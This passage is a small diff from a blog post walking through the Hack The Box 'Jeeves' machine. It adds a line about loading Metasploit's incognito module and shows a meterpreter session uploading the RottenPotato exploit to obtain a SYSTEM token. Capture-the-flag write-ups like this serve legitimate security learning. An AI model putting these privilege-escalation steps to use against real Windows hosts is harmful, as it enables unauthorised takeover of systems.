1n4r1/1n4r1.github.io/_posts/2019-09-16-Hackthebox-Jeeves-Walkthrough.md

 {% endhighlight %}

 Then, achieve a token for SYSTEM user with the following procedure.
+We need to load module <a href="https://www.offensive-security.com/metasploit-unleashed/fun-incognito/">incognito</a> for that.
 {% highlight shell %}
 meterpreter > upload /root/RottenPotato/rottenpotato.exe .
 [*] uploading  : /root/RottenPotato/rottenpotato.exe -> .